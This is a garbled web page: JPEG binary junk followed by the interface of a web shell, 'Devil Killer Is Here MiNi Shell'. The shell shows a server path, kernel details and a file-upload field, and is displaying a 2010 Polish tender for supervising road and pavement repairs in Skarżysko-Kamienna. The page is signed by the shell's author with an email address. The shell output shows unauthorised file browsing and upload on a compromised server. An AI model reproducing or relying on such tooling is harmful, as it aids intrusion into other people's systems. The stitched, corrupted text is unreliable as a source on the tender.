JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100809/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100809/243672-N-2010.html

<p class="kh_header"><b>Skarżysko-Kamienna: pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją remontów dróg powiatowych na terenie powiatu skarżyskiego</b><br>
<b>Numer ogłoszenia: 243672 - 2010; data zamieszczenia: 09.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Skarżyski reprezentowany przez Zarząd Dróg Powiatowych , ul. Konarskiego 20, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 2524451, faks 041 2524451.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spskarzysko.bip.doc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją remontów dróg powiatowych na terenie powiatu skarżyskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest pełnienie nadzoru inwestorskiego nad                                                                                                     	realizacją n/w zadań:
	Zadanie 1 (Część 1). Remont drogi powiatowej nr 0307T Wąsosza - Belno/-Zalezianka - 	Łączna w m. Zalezianka od km 6+790 do km 7+702
	 Zakres rzeczowy robót 	obejmuje m.in.: wykonanie podbudowy z mieszanki 	mce, 	wykonanie 	nawierzchni z 	mieszanki min. - bit. warstwa wiążąca, 	wykonanie 	nawierzchni z 	mieszanki min. - 	bit. warstwa ścieralna, 	uzupełnienie poboczy materiałem kamiennym.
	Szczegółowy zakres robót zawiera przedmiar robót stanowiący załącznik nr 7/1 	do 	SIWZ. 
  	Zadanie 2 (Część 2).Przebudowa drogi powiatowej nr 0446T Bliżyn - Sorbin - Odrowążek 	od km 4+550 do km 7+459 
	Zakres rzeczowy robót obejmuje m.in.: frezowanie nawierzchni bitumicznej, 	wyrównanie 	istniejącej  podbudowy  mieszanką  mineralno - bitumiczną, wykonanie 	nawierzchni  	z 	mieszanki min. - bit. warstwa wiążąca, wykonanie 	nawierzchni 	z mieszanki 	min. - 	bit. warstwa ścieralna,  uzupełnienie poboczy 	materiałem 	kamiennym.	
	Szczegółowy 	zakres robót objętych nadzorem zawiera przedmiar robót stanowiący 	załącznik nr 7/2 do SIWZ. 
  	
	Zadanie 3 (Cześć 3):  Remonty chodników w ciągach ulic powiatowych	
            1. Remont chodnika w ciągu ul. Niepodległości na odcinku od ul. Krasińskiego do Lidla strona południowa 
		Remont chodnika obejmuje m.in. wykonanie: roboty rozbiórkowe: krawężników 	betonowych, ław pod krawężniki, obrzeży trawnikowych, chodników z płyt 	betonowych 50x50x7, nawierzchni chodników z mieszanek mineralno-bitumicznych, , 	wywiezienie gruzu, ustawienie krawężników 15x30 cm na ławie betonowej z oporem, 	wykonanie nawierzchni chodnika z kostki brukowej betonowej grubości 8cm na 	podsypce cementowo - piaskowej grubości 5 cm,ustawienia obrzeży betonowych o 	wymiarach 6x20 cm,wykonanie trawników z humusowaniem gr. 2 cm.
         2. Remont chodnika w ciągu ul. Sokolej na odcinku od ul. Wiejskiej do ul. Rejowskiej strona zachodnia
		Remont chodnika obejmuje m.in. wykonanie: roboty pomiarowe i przygotowawcze; 	roboty 	rozbiórkowe: nawierzchni z kostki betonowej brukowej gr. 8 cm, chodnika z 	płyt betonowych 50x50x7, obrzeży trawnikowych 20x6; wywiezienie gruzu, 	wykonanie nawierzchni chodnika z kostki brukowej betonowej grubości 8cm na 	podsypce cementowo - piaskowej ,ustawienia obrzeży betonowych o wymiarach 6x20 	cm,humusowanie i obsianie skarp przy grubości warstwy humusu 5 cm z dowozem z	ziemi urodzajnej, regulacja pionowa studzienek dla urządzeń podziemnych, wpusty 	uliczne, studnie teletechniczne, zawory.
      	 3. Remont chodnika w ciągu ul. Rejowskiej na odcinku od ul. Sokolej do ul. Zielnej strona północna
		Remont chodnika obejmuje m.in. wykonanie: roboty rozbiórkowe: rozebranie obrzeży 	trawnikowych 20x6, krawężnika 15; cokołu z betonu, chodnika z kostki brukowej 	betonowej, chodników, płyty betonowe 50x50x7 na podsypce piaskowej; wywiezienie 	gruzu; ustawienie krawężnika 15 na ławie betonowej, wykonanie trawników z 	humusowaniem gr. 2 cm, regulacja studzienek rewizyjnych, regulacja studzienek dla 	zaworów wodociągowych i gazowych, ustawienie obrzeży trawnikowych 20x6 cm, 	wykonanie nawierzchni z kostki brukowej betonowej gr. 8 cm na podsypce 	cementowo -piaskowej (kostka szara); wykonanie nawierzchni z kostki brukowej 	betonowej gr. 8 cm na podsypce cementowo -piaskowej (kostka kolorowa).
      	4. Remont schodów terenowych w ciągu ul. Piłsudskiego przy bloku nr 28 i 29 oraz przy pawilonach handlowych Piłsudskiego 19
		Remont chodnika obejmuje m.in. wykonanie: roboty ziemne, roboty rozbiórkowe: 	rozebranie istniejących schodów betonowych, chodnika z kostki brukowej gr. 8 cm na 	podsypce cementowo -piaskowej; wykonanie nawierzchni z kostki brukowej 	betonowej gr. 8 cm na podsypce cementowo -piaskowej (kostka szara); wykonanie 	nawierzchni z kostki brukowej betonowej gr. 8 cm na podsypce cementowo -	piaskowej (kostka szara) - materiał z odzysku; ustawienie obrzeży trawnikowych 	30x8 cm, regulacja pionowa studzienek dla urządzeń podziemnych: wpusty uliczne, 	studnie teletechniczne; wykonanie stopni schodów z betonu B-15; wykonanie poręczy 	ochronnych sztywnych z pochwytami i poręczami z rur stalowych.
                               5. Remont chodnika w ciągu ul. 1-go Maja na odcinku od ul. Staszica do ul. Czerwonego Krzyża strona północna
	Remont chodnika obejmuje m.in. wykonanie: roboty rozbiórkowe: rozebranie obrzeży 	trawnikowych 20x6, krawężnika 15, chodnika z kostki brukowej betonowej, 	chodników - płyty betonowe 50x50x7 na podsypce piaskowej; ustawienie krawężnika 	15 na ławie betonowej, wykonanie trawników z humusowaniem gr. 2 cm, regulacja 	studzienek rewizyjnych, regulacja studzienek dla zaworów wodociągowych i 	gazowych; wykonanie nawierzchni z kostki brukowej betonowej gr. 8 cm na podsypce 	cementowo -piaskowej (kostka szara); wykonanie nawierzchni z kostki brukowej 	betonowej gr. 8 cm na podsypce cementowo -piaskowej (kostka kolorowa)
	
	Szczegółowy 	zakres robót  w/w zadania objętego nadzorem zawiera przedmiar robót 	stanowiący załącznik nr 7/3 do SIWZ. 

	Zadanie 4 (Część 4): Przebudowa ul. 1-go Maja w Skarżysku-Kamiennej na odcinku od 	ul. Pięknej do mostu na rzece Oleśnica
	Zakres rzeczowy robót obejmuje m.in.:  rozebranie chodników, wykonanie 	podbudowy z 	mieszanki mineralno-bitumicznej, wykonanie nawierzchni z mieszanek 	mineralno-bitumicznych, wykonanie chodników z kostki brukowej betonowej. 
	
	Szczegółowy 	zakres robót objętych nadzorem zawiera przedmiar robót stanowiący 	załącznik nr 7/4 do SIWZ. 

	Szczegółowy zakres obowiązków, które Wykonawca będzie musiał wykonać   	zawiera projekt umowy stanowiący załącznik nr 8 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje  udzielenie  zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy do 20 % wartości zamówienia podstawowego, dla każdej z części.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy,  w tym okresie wykonał co najmniej dwie usługi polegające na pełnieniu nadzoru inwestorskiego nad budową, przebudową lub remontem drogi               o wartości każdej z nadzorowanych robót min. 200 tys. zł brutto niezależnie na ile części składana będzie oferta,
		wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że będzie dysponował (niezależnie na ile części Wykonawca będzie składał ofertę) co najmniej jedną osobą, która uczestniczyć będzie                          w wykonywaniu zamówienia  tj. osobą pełniącą funkcję inspektora nadzoru inwestorskiego posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej określone przepisami Prawa budowlanego lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów oraz przedłoży oświadczenie, że osoby te posiadają wymagane uprawnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty, 2) Pełnomocnictwo, jeżeli osoba/y podpisujące ofertę działają na podstawie pełnomocnictwa. Pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty, 3) Pełnomocnictwo 	do reprezentowania Wykonawców w postępowaniu albo                     w postępowaniu i zawarciu umowy w przypadku wspólnego ubiegania się                        o udzielenie zamówienia, 4) pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w przypadku gdy Wykonawca  wykazując spełnianie warunków udziału w postępowaniu polega na zasobach tych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy mogą nastąpić w okolicznościach i na warunkach określonych w pkt. 1-3
1. Dopuszcza się zmianę przedłużenia terminu zakończenia umowy w przypadku wydłużenia terminu wykonania nadzorowanych robót. Nowy termin zakończenia umowy strony ustalą  w aneksie do umowy. 
2.  Wykonawca może dokonywać zmiany osoby inspektora nadzoru w przypadku:
     a)  śmierci, choroby  lub innych zdarzeń losowych osoby inspektora,
     b) niewywiązywania się inspektora z obowiązków wynikających z umowy,
     c) jeżeli zmiana inspektora nadzoru stanie się konieczna z jakichkolwiek innych przyczyn     	niezależnych od wykonawcy (np. rezygnacji itp.)
Zmiana może nastąpić na pisemny, uzasadniony wniosek Wykonawcy, pod warunkiem że wskazana  osoba spełniać będzie wymagania określone w specyfikacji istotnych warunków zamówienia. 
3. Dopuszcza sie zmianę wynagrodzenia należnego wykonawcy, w przypadku wprowadzenia urzędowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spskarzysko.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowycxh w Skarżysku-Kamiennej, ul. Konarskiego 20, 26-110 Skarżysko-Kamienna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Skarżysku-Kamiennej, ul. Konarskiego 20, 26-110 Skarżysko-Kamienna, pokój 412 (IV piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com